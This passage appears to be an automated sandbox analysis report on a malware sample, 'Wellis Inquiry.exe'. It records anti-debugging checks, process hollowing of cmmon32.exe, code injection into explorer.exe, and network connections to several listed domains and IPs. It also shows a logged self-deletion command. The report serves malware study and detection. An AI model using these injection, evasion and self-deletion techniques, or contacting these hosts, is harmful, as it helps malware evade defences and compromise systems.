          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04757794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04757794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04757794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046E8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04792073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04757016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04757016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04757016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046D58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_00409B40 LdrLoadDll,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.marunouchi1.com
          Source: C:\Windows\explorer.exeNetwork Connect: 183.90.240.3 80
          Source: C:\Windows\explorer.exeNetwork Connect: 151.106.117.36 80
          Source: C:\Windows\explorer.exeDomain query: www.richartware.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.ebookgratis.online
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exeDomain query: www.ovmfinacial.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.blackmagiccomics.com
          Source: C:\Windows\explorer.exeDomain query: www.psychedeliccosmetics.com
          Source: C:\Windows\explorer.exeDomain query: www.dollpartyla.com
          Source: C:\Windows\explorer.exeDomain query: www.aceserial.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.2.218 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 2C0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess created: C:\Users\user\Desktop\Wellis Inquiry.exe C:\Users\user\Desktop\Wellis Inquiry.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Wellis Inquiry.exe'
          Source: explorer.exe, 00000004.00000000.691080863.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.705317184.0000000001080000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.705317184.0000000001080000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.705317184.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.705317184.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.697371801.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Users\user\Desktop\Wellis Inquiry.exe VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
